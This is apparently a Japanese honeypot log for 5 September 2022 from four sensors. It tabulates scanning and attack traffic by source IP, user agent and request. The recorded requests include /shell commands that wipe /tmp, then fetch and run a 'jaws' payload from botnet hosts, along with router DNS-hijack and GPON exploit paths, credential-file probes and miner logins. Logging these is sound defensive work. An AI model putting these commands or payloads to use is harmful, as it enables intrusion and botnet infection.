ハニーポット(仮) 観測記録 2022/09/05分です。
特徴
共通
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Location:JP
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
5.254.26.145に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget botnet.psscc.cn/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget rischyo.cf/jaws; sh /tmp/jaws
Location:US
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
89.203.249.204に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget botnet.psscc.cn/jaws; sh /tmp/jaws
Location:UK
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
5.254.17.35に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget botnet.psscc.cn/jaws; sh /tmp/jaws
Location:SG
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
5.254.17.35に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget botnet.psscc.cn/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:100 (前日比:38)
US:総アクセス数:98 (前日比:-47)
UK:総アクセス数:105 (前日比:46)
SG:総アクセス数:67 (前日比:2)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 4 | 1.116.6.211 | China |
| 1 | 13.77.41.31 | United States |
| 10 | 20.46.181.28 | United States |
| 1 | 20.119.96.169 | United States |
| 2 | 20.219.98.249 | United States |
| 2 | 36.103.235.133 | China |
| 4 | 66.70.176.28 | Canada |
| 8 | 71.6.135.131 | United States |
| 1 | 92.118.39.30 | Romania |
| 16 | 95.214.235.205 | Ukraine |
| 3 | 101.35.161.133 | China |
| 2 | 109.237.103.38 | Russia |
| 2 | 114.116.53.51 | China |
| 4 | 118.195.252.158 | China |
| 1 | 128.14.133.58 | United States |
| 17 | 135.125.246.189 | France |
| 1 | 141.98.6.162 | Bulgaria |
| 4 | 152.136.186.35 | China |
| 1 | 156.198.3.189 | Egypt |
| 1 | 161.35.213.88 | United States |
| 1 | 162.142.125.8 | United States |
| 1 | 167.94.145.57 | United States |
| 1 | 167.248.133.60 | United States |
| 1 | 172.104.242.173 | United States |
| 2 | 179.43.155.171 | Panama |
| 4 | 183.136.225.35 | China |
| 1 | 188.214.133.195 | Lithuania |
| 1 | 198.199.93.54 | United States |
| 1 | 198.199.105.162 | United States |
| 1 | 198.235.24.155 | United States |
| 1 | 218.145.61.20 | South Korea |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 27 | - |
| 4 | Go-http-client/1.1 |
| 4 | Hello, world |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 36 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 9 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
| 2 | `` |
| 1 | python-requests/2.27.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01\x01C\x01 |
||
| 2 | \x16\x03\x01 |
||
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
| 1 | CONNECT | 5[.]254[.]26[.]145:4444 |
HTTP/1.1 |
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 1 | GET | /.env.bak |
HTTP/1.1 |
| 39 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /Yb5m |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /admin/ |
HTTP/1.1 |
| 1 | GET | /aws.yml |
HTTP/1.1 |
| 1 | GET | /config.js |
HTTP/1.1 |
| 1 | GET | /config/aws.yml |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 7 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /oVUB |
HTTP/1.1 |
| 1 | GET | /phpinfo.php |
HTTP/1.1 |
| 1 | GET | /phpinfo |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 3 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+botnet[.]psscc[.]cn/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 3 | GET | /shell?cd+/tmp;rm+-rf+*;wget+rischyo[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /static../.git/config |
HTTP/1.1 |
| 5 | GET | http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php |
HTTP/1.0 |
| 4 | GET | http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php |
HTTP/1.0 |
| 5 | GET | http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php |
HTTP/1.0 |
| 5 | GET | http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
| 1 | HEAD | /images/login.png |
HTTP/1.1 |
| 1 | HEAD | /images/login1.png |
HTTP/1.1 |
| 1 | HEAD | /images/login1_5.png |
HTTP/1.1 |
| 1 | HEAD | /images/weblogin.png |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.9.71.118 | United States |
| 1 | 20.86.7.226 | United States |
| 1 | 20.190.96.190 | United States |
| 1 | 20.196.129.167 | United States |
| 1 | 20.214.101.92 | United States |
| 1 | 27.0.175.252 | Spain |
| 4 | 27.124.5.120 | Singapore |
| 1 | 45.95.55.245 | Germany |
| 4 | 51.79.29.48 | Canada |
| 20 | 54.37.79.75 | France |
| 1 | 54.91.5.228 | United States |
| 2 | 62.210.217.151 | France |
| 1 | 65.49.20.76 | United States |
| 8 | 66.240.236.119 | United States |
| 1 | 89.203.249.204 | Czechia |
| 1 | 92.118.39.30 | Romania |
| 1 | 92.255.85.183 | Hong Kong |
| 2 | 109.237.103.38 | Russia |
| 1 | 115.178.17.92 | Australia |
| 1 | 135.181.252.104 | Germany |
| 2 | 141.98.6.162 | Bulgaria |
| 2 | 152.89.196.62 | Russia |
| 5 | 156.208.7.84 | Egypt |
| 2 | 162.142.125.213 | United States |
| 2 | 162.142.125.219 | United States |
| 10 | 185.162.235.116 | Russia |
| 1 | 185.196.220.81 | Netherlands |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 192.99.62.110 | Canada |
| 1 | 192.241.195.180 | United States |
| 1 | 192.241.213.58 | United States |
| 1 | 192.241.215.109 | United States |
| 1 | 193.118.53.194 | United States |
| 2 | 194.26.228.174 | Russia |
| 1 | 205.210.31.13 | United States |
| 1 | 208.67.107.247 | United States |
| 2 | 223.88.129.133 | China |
| 1 | 223.130.31.75 | India |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 17 | - |
| 7 | Go-http-client/1.1 |
| 7 | Hello, world |
| 1 | Java/11.0.16 |
| 1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 2 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3947.100 Safari/537.36 2345Explorer/10.26.0.21808 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0 |
| 38 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333) |
| 3 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01C\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 3 | \x16\x03\x01 |
||
| 1 | {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4B9ytZBhj3EEpKPNUpQuK9MDp3NAYHY2E8bsSpwuXmP1VuKXuQVmJ8iJspRrvwy5gHVswQu32pcoDerxqMHVUQJe5hyzVoi\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 |
(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n | |
| 1 | {\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0xcf9f4ec43d0bd9ee78796570657c3c8cb8032dbb\",\"x\"],\"jsonrpc\":\"2.0\"}\n |
||
| 1 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n | |
| 1 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n | |
| 1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 1 | CONNECT | www[.]google[.]com:443 |
HTTP/1.1 |
| 38 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /SiteLoader |
HTTP/1.1 |
| 1 | GET | /WuEL |
HTTP/1.1 |
| 1 | GET | /a |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /admin/ |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
| 2 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /dnscfg.cgi?dnsPrimary=128.0.104.18&dnsSecondary=128.0.104.33&dnsDynamic=0&dnsRefresh=1 |
HTTP/1.1 |
| 1 | GET | /download/file.ext |
HTTP/1.1 |
| 7 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /index/mobile/index.html |
HTTP/1.1 |
| 1 | GET | /mPlayer |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 5 | GET | /shell?cd+/tmp;rm+-rf+*;wget+botnet[.]psscc[.]cn/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 2 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /user/register/ |
HTTP/1.1 |
| 1 | GET | /users/sign_in |
HTTP/1.1 |
| 1 | GET | http[:]//89[.]203[.]249[.]204/ |
HTTP/1.1 |
| 1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
| 1 | HEAD | /images/login.png |
HTTP/1.1 |
| 1 | HEAD | /images/login1.png |
HTTP/1.1 |
| 1 | HEAD | /images/login1_5.png |
HTTP/1.1 |
| 1 | HEAD | /images/weblogin.png |
HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /dnscfg.cgi?dnsPrimary=128.0.104.18&dnsSecondary=128.0.104.18&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 4 | 1.117.28.97 | China |
| 1 | 20.171.217.140 | United States |
| 1 | 20.214.101.166 | United States |
| 4 | 23.224.189.31 | United States |
| 10 | 34.65.112.53 | United States |
| 4 | 43.138.110.26 | China |
| 4 | 46.226.108.165 | France |
| 1 | 64.225.5.197 | United States |
| 1 | 92.118.39.30 | Romania |
| 1 | 101.43.83.130 | China |
| 1 | 107.170.204.35 | United States |
| 2 | 109.237.103.38 | Russia |
| 1 | 124.218.150.114 | Taiwan |
| 1 | 141.98.6.162 | Bulgaria |
| 1 | 143.198.119.29 | United States |
| 2 | 152.89.196.62 | Russia |
| 4 | 152.136.186.35 | China |
| 2 | 167.94.138.46 | United States |
| 1 | 172.104.242.173 | United States |
| 4 | 175.178.71.102 | China |
| 4 | 182.254.225.35 | China |
| 1 | 184.105.247.250 | United States |
| 1 | 185.196.220.81 | Netherlands |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 188.214.129.101 | Lithuania |
| 4 | 192.144.226.159 | China |
| 1 | 192.241.203.18 | United States |
| 1 | 192.241.212.192 | United States |
| 1 | 192.241.220.43 | United States |
| 1 | 194.26.228.174 | Russia |
| 24 | 195.96.137.7 | United States |
| 1 | 197.42.199.35 | Egypt |
| 1 | 205.210.31.21 | United States |
| 1 | 209.141.57.178 | United States |
| 3 | 222.186.19.235 | China |
| 2 | 223.88.129.133 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 44 | - |
| 6 | Go-http-client/1.1 |
| 1 | Hello, World |
| 3 | Hello, world |
| 8 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 |
| 1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 |
| 2 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3947.100 Safari/537.36 2345Explorer/10.26.0.21808 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.596.0 Safari/534.13 |
| 9 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 3 | Mozilla/5.0 zgrab/0.x |
| 17 | curl/7.54.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 1 | \x16\x03\x01\x01C\x01 |
||
| 6 | \x16\x03\x01\x02 |
||
| 4 | \x16\x03\x01 |
||
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
| 1 | CONNECT | 5[.]254[.]17[.]35:4444 |
HTTP/1.1 |
| 1 | GET | /.DS_Store |
HTTP/1.1 |
| 10 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/HEAD |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.json |
HTTP/1.1 |
| 1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
HTTP/1.1 |
| 1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /A5rt |
HTTP/1.1 |
| 1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
| 1 | GET | /HNAP1 |
HTTP/1.1 |
| 1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
| 1 | GET | /Portal0000.htm |
HTTP/1.1 |
| 1 | GET | /__Additional |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /config.json |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /dnscfg.cgi?dnsPrimary=128.0.104.18&dnsSecondary=128.0.104.33&dnsDynamic=0&dnsRefresh=1 |
HTTP/1.1 |
| 1 | GET | /docs/cplugError.html/ |
HTTP/1.1 |
| 7 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /idx_config/ |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /menu.html |
HTTP/1.1 |
| 1 | GET | /nmaplowercheck1662293544 |
HTTP/1.1 |
| 1 | GET | /pools/default/buckets |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 2 | GET | /server-status |
HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+botnet[.]psscc[.]cn/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /start.php |
HTTP/1.1 |
| 1 | GET | /telescope/requests |
HTTP/1.1 |
| 1 | GET | /user/register/ |
HTTP/1.1 |
| 7 | GET | http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php |
HTTP/1.0 |
| 8 | GET | http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php |
HTTP/1.0 |
| 7 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php |
HTTP/1.0 |
| 7 | GET | http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php |
HTTP/1.0 |
| 1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
| 2 | GET | http[:]//fuwu[.]sogou[.]com/404/index.html |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /scripts/WPnBr.dll |
HTTP/1.1 |
| 1 | POST | /sdk |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.87.89.223 | United States |
| 1 | 20.188.24.63 | United States |
| 4 | 23.224.186.219 | United States |
| 1 | 34.230.74.220 | United States |
| 1 | 45.95.55.245 | Germany |
| 20 | 51.79.29.48 | Canada |
| 5 | 54.37.79.75 | France |
| 1 | 64.62.197.104 | United States |
| 1 | 92.118.39.30 | Romania |
| 1 | 134.209.153.173 | United States |
| 1 | 138.197.183.239 | United States |
| 1 | 141.98.6.162 | Bulgaria |
| 2 | 152.89.196.62 | Russia |
| 1 | 156.216.87.231 | Egypt |
| 1 | 156.220.163.220 | Egypt |
| 2 | 162.142.125.211 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 179.43.140.150 | Panama |
| 2 | 179.43.155.171 | Panama |
| 1 | 185.196.220.81 | Netherlands |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 188.214.129.101 | Lithuania |
| 2 | 188.214.133.195 | Lithuania |
| 1 | 192.241.212.192 | United States |
| 1 | 192.241.215.243 | United States |
| 1 | 192.241.219.237 | United States |
| 1 | 194.26.228.174 | Russia |
| 1 | 205.210.31.136 | United States |
| 2 | 222.186.19.235 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 9 | - |
| 6 | Go-http-client/1.1 |
| 3 | Hello, world |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 OPR/89.0.4447.64 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21 |
| 34 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 4 | \x16\x03\x01 |
||
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
| 3 | CONNECT | 5[.]254[.]17[.]35:4444 |
HTTP/1.1 |
| 1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 35 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /autodiscover/autodiscover.json/v1.0/1@interact.sh?Protocol=Autodiscoverv1 |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /dnscfg.cgi?dnsPrimary=128.0.104.18&dnsSecondary=128.0.104.33&dnsDynamic=0&dnsRefresh=1 |
HTTP/1.1 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+botnet[.]psscc[.]cn/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /static../.git/config |
HTTP/1.1 |
| 1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
| 2 | GET | http[:]//fuwu[.]sogou[.]com/404/index.html |
HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
